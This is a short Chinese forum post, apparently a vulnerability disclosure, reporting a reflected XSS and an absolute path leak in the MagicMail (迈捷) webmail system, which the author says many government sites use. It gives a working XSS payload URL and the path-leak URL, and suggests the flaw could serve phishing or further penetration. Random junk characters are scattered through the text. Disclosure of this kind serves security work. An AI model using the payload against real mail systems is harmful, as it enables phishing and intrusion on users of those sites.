今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞: j4 P* Z3 o) ?( u% p" Y% y
0 F* w, X. |, G2 J
, h1 Q/ x% u' M, L ^4 }9 u' p: K包含 一个反射性XSS 以及 绝对路径泄漏8 f. } W' F& ~" I4 [- s( R/ s
看了看 貌似全部是linux的。
( | G6 B |& [ 9 E) I- Z$ C; n! E+ [9 s. T! C! t
关键字:迈捷邮件系统 by MagicMail' H+ {( c- @6 o# B3 q0 |
. g& q- _( K7 m9 Y可以看到很多政府网站都用这个邮件系统
p! x6 k, T7 x: R1 d& Z, g6 v+ J: U$ @1 ^& N% Z) h F
绝对路径 http://madman.in/index.php?login_type=declare&language=
( B1 K. `- j: B4 L! w
3 f6 J" ?+ ]% b/ ~+ T8 Z& B
6 P& Q% t6 f, P, @; z' l4 n
( F, ~9 }* m) L+ C; o7 ]. H iXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E2 i: j3 L' t4 |
" m* [8 y5 H" h& N% a3 T1 N, H8 O- v3 p* l1 w# c5 M3 T m
3 ~& o0 l' h7 T; U
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等! A/ O" g3 p5 r1 a6 X
) ]+ i8 V& Q. K3 ]/ p3 H+ a( |修复方案:看官方补丁吧。1 _3 p; ]5 e6 e% F( k. M" ^8 X
|